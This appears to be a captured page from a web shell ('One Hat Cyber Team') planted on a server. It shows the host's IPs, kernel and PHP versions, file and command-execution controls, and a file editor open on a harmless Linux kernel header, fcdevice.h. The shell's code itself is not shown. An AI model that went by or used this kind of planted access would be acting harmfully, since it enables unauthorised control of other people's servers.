⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.131
Server IP:
57.129.66.90
Server:
Linux vps-7f548908 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
src
/
linux-headers-5.15.0-160
/
include
/
linux
/
Edit File: fcdevice.h
/* SPDX-License-Identifier: GPL-2.0-or-later */ /* * INET An implementation of the TCP/IP protocol suite for the LINUX * operating system. NET is implemented using the BSD Socket * interface as the means of communication with the user level. * * Definitions for the Fibre Channel handlers. * * Version: @(#)fcdevice.h 1.0.0 09/26/98 * * Authors: Vineet Abraham
* * Relocated to include/linux where it belongs by Alan Cox *
* * WARNING: This move may well be temporary. This file will get merged with others RSN. */ #ifndef _LINUX_FCDEVICE_H #define _LINUX_FCDEVICE_H #include
#ifdef __KERNEL__ struct net_device *alloc_fcdev(int sizeof_priv); #endif #endif /* _LINUX_FCDEVICE_H */
Simpan